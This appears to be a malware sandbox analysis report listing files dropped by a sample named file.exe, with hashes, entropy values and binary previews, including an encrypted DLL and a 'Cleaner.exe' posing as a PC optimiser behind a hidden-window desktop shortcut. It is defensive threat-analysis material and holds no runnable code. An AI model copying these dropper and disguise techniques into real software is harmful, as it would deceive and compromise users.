C:\ProgramData\Microsoft\Windows\WER\Temp\WERC0CF.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.456809682060808
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoV8fm8M4JbHvMFW+q8vcHvqr8MjT9d:uITfq/bgrsqYPJrPKqqr8MX9d
MD5:	768CEA8AD562E23A8CBFCB6EC4EB04DA
SHA1:	070B615C60CFB6244C556BF135052D4406432464
SHA-256:	FDC954275474D88A1DC5B8B4BBA2DDFFC2DFF5980E28C1A470396A72936C11F1
SHA-512:	294811FD3B8A18EDE649EA66BAB43A896570E372D74ED416747B515B589E77BA718709D14FFA2217CA734AC12F3712443FA3209A4BD724C164A20383245AFB89
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5CE.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:12 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	94696
Entropy (8bit):	2.032305060611396
Encrypted:	false
SSDEEP:	384:LdznPkILkenugjeigkt/G3E/f+TVYAaLFAlwUnh885F6sGnEOysPLbhKrzCAxp:xPkK5sAt/9f+JYAaRAldh885Femr1xp
MD5:	740EDDFA289CB5F8606AE88F5DF6A6A5
SHA1:	66B26C9CD3C9E0807DDFBB4FDE56D2E1B2D63993
SHA-256:	8525B7D1ADB883F1CB5F0D80A8F4135154139DEC4F2B2A678AD6AD39E5A611A5
SHA-512:	65D995B5A732C4550698B638A67FC5F92F8795495BC8ECFDF3B975D7573A992C978A6442AF134A2639D379F2BF95EA1447C1D0259CEEF7D59E753F04C3AB81F0
Malicious:	false
Preview:	MDMP....... .......d.;c........................x...........$...D?..........T.......8...........T...........x$..pM..........d...........P....................................................................U...........B..............GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8FC.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.694128664383589
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWC/6I196YqvSUI5vgmf6VSjCpBp89bJFtsfYDm:RrlsNid6I196YCSUI5vgmfkSPJFmfx
MD5:	4327B31DE5EC172DC0D027F94E81A2B9
SHA1:	69AF407D736BB68867E754F0D5A89A3F1C50058B
SHA-256:	C7789CEA73434AE820260AF83A261D4DDB64A4B3F8818676BBB9473C0DB28446
SHA-512:	1B28A03266220BCB1B3647981D05381C8A9CEEF11A7D31568E77EB6A95E0A16133D031898FC8AEC77CDA4CD745E570B1DDD3853CAF58A4A463289A54956C4612
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC989.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.456543489329578
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoT8fm8M4JbHvMFeX+q8vcHvqr8MjT9d:uITfq/bgrsqYpJrzKqqr8MX9d
MD5:	B27A3C89FDF9081809AADEAB819A4AD8
SHA1:	929D26D0531F5D3B336FDD1B3439C4E0D2DB99E5
SHA-256:	596D8F173FC69F12713C334DCAEE3795B433B6193F0E70C95148D34C63580B7B
SHA-512:	25F3A8C4340C50815777838FD7E91B43162DFB55431DA91CEBD58EBA0AFB8BE31EC32B25162BB208B25D0BA044EC8A294DEFB472F1979D7C0DAE816A1129A2AB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2AF.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:16 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	103486
Entropy (8bit):	2.079533641583313
Encrypted:	false
SSDEEP:	768:Ql07PzhFKWt28jQyBSDRAldh88U2ewfBA:QefTKWt9jQyBStAbh88U21pA
MD5:	A69C321636D9B1516AD596BDFF134792
SHA1:	DBB6F7FCE474E00337B74DA044AA8EDBC68F1467
SHA-256:	54299B6E6E01D0D25E444837FCA64D17EEF857699D308AEA61EB3734660273C0
SHA-512:	AFB58937F08616680B927A0763C7BB4C8EF6F73DCC32231037240ACC43A4276E1DE9C0CA524358414C97B675B1DF387E6CCEB5931FA1B504AD66D9BCE6F81A97
Malicious:	false
Preview:	MDMP....... .......h.;c.........................................C..........T.......8...........T...........@*...i...........................................................................................U...........B......\.......GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD5FC.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.695746710879512
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWC36IqV6Yq2SUqhcgmf6VSjCpBe89bkFtsfwMm:RrlsNiV6IqV6Y7SUqhcgmfkS+kFmf6
MD5:	E4443C010D0D8E5882AF7F8A6FB54CCC
SHA1:	FF275BDF9BB421E1791778F2BB8043639DE71F34
SHA-256:	F9C6FFAAE05F575B4F13D0BE0AAC9E17C21D4FA0CDC77895524C115DACCAEE2E
SHA-512:	24090CE120BBADC5D23F6406975C1CC1B454BCCA2A4D04EE65B6A01E8D5B994EA4E370C1502DFDA5E2723B9F10F85202271FB47D2EC4F1F65740E509105D1D0F
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD699.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.455971551312978
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoh8fm8M4JbHvMF7+q8vcHvqr8MjT9d:uITfq/bgrsqYrJrKKqqr8MX9d
MD5:	B42789C00F6F69BDFD484CAA8E282AD6
SHA1:	10B60B4A44F1D91BE5E4A5E915AF048AF7929B45
SHA-256:	C1942FBCE24A3B4EC0B65B1DCBBAE3AA15E2272F05A4978D21A5288703EE0DF9
SHA-512:	64ABE75E2677EE5396EF71D67843492B87A2D40E76861296E7FF0467E477F86FBF2DABE88A7D0C4183829FA66B9F7D62AC9F5B77E814FF79BF757B9CDCF83F81
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\library[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\ping[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\fuckingdllENCR[1].dll

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	94224
Entropy (8bit):	7.998072640845361
Encrypted:	true
SSDEEP:	1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
MD5:	418619EA97671304AF80EC60F5A50B62
SHA1:	F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
SHA-256:	EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
SHA-512:	F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
Malicious:	false
Preview:	...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.\|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..\|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=\|....'....[1.~.YB:./...A`...=..F..K...........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\ping[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\library[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\soft[1]

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3947920
Entropy (8bit):	7.275018147968825
Encrypted:	false
SSDEEP:	49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
MD5:	04514BD4962F7D60679434E0EBE49184
SHA1:	1493A5447EB8156A7D7AECFF60EE8BFBA2209526
SHA-256:	C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
SHA-512:	A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\ping[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.1751231351134614
Encrypted:	false
SSDEEP:	3:nCmxEl:Cmc
MD5:	064DB2A4C3D31A4DC6AA2538F3FE7377
SHA1:	8F877AE1873C88076D854425221E352CA4178DFA
SHA-256:	0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
SHA-512:	CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
Malicious:	false
Preview:	UwUoooIIrwgh24uuU

C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3947920
Entropy (8bit):	7.275018147968825
Encrypted:	false
SSDEEP:	49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
MD5:	04514BD4962F7D60679434E0EBE49184
SHA1:	1493A5447EB8156A7D7AECFF60EE8BFBA2209526
SHA-256:	C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
SHA-512:	A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\Desktop\Cleaner.lnk

Process:	C:\Users\user\Desktop\file.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Oct 3 23:42:37 2022, mtime=Mon Oct 3 23:42:37 2022, atime=Mon Oct 3 23:42:37 2022, length=3947920, window=hide
Category:	dropped
Size (bytes):	2108
Entropy (8bit):	3.79203453899752
Encrypted:	false
SSDEEP:	24:8s9b97AO9Yz/cORKgKFEStqAy8a995P3hP3SO4ZDqP3j9U3S7aB6m:8cZ7ASYzUORgEStZC35PRPiZDqP5gB6
MD5:	F0F16C17D68F259E90BFDAEE49A6AF21
SHA1:	92237FCD627CC22BF0FE010D3AA078653315AB4E
SHA-256:	6099178FF02C6F2062431E8B5E2EC7B14FD577063208881A42E47943D98D9FF3
SHA-512:	6CA14DF652C28FBBE21310B11E6595479625CF3CEB7830768C3AD31C6D692A05AE405D4C3FC7852164A8E4956BB30F3EA56EDA84D51F017FBC588BB39E2A8A53
Malicious:	false
Preview:	L..................F.@.. .....T3......W3......W3.....=<..................... .:..DG..Yr?.D..U..k0.&...&........d.!-..`.0+......4........t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..DU4......Y.....................t..A.p.p.D.a.t.a...B.P.1.....>Q.z..Local.<.......N..DU4......Y.....................V..L.o.c.a.l.....N.1.....DUJ...Temp..:.......N..DUJ......Y......................T.e.m.p.....b.1.....DUJ...GVBGWX~1..J......DUJ.DUJ......V......................g.V.b.g.w.X.d.N.t.g.M.n.....b.2..=<.DUS. .Cleaner.exe.H......DUS.DUS......V....................K.W.C.l.e.a.n.e.r...e.x.e.......l...............-.......k...........j .X.....C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe....O.p.t.i.m.i.z.e. .y.o.u.r. .P.C.......\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.g.V.b.g.w.X.d.N.t.g.M.n.\.C.l.e.a.n.e.r...e.x.e.=.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.g.V.b.g.w.X.d.N.t.g.M.n.\.C.l.e.a.n.e.r...e.x.e.........%USERPROFI

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.462227283357498
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	238080
MD5:	526fde9e61b1b4835885973331fa1616
SHA1:	ebbb0c3586b8a0244585eacb44ca125ac933ad8e
SHA256:	093741e4079a8092ba9d94653cb4f11c15fbe1e9ef53690e91628c61f0cc9440
SHA512:	ceff6066cd30ead43c4afcdc1b227ae114d4174fb75ff68c1495cbc6ef7bcb158bf2535669bd9add353e72ed3b97df48a9ad4cf21941db9d702d6f786bbae318
